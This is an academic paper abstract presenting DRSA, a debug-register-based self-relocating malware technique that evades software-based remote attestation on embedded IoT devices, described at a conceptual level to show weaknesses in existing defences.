DRSA: Debug Register-Based Self-relocating Attack Against Software-Based Remote Authentication

Remote attestation (RA) is an essential feature in many security protocols to verify the memory integrity of remote embedded (IoT) devices. Several RA techniques have been proposed to verify the remote device binary at the time when a checksum function is executed over a specific memory region. A self-relocating malware may try to move itself to avoid being “caught” by the checksum function because the attestation provides no information about the device binary before the current checksum function execution or between consecutive checksum function executions. Several software-based that lack of dedicated hardware rely on detecting the extra latency incurred by the moving process of self-relocating malware by setting tight time constraints. In this paper, we demonstrate the shortcomings of existing software-based approaches by presenting Debug Register-based Self-relocating Attack (DRSA). DRSA monitors the execution of the checksum function using the debug registers and erases itself before the next attestation. Our evaluation demonstrates that DRSA incurs low overhead, and it is extremely difficult for the verifier to detect it.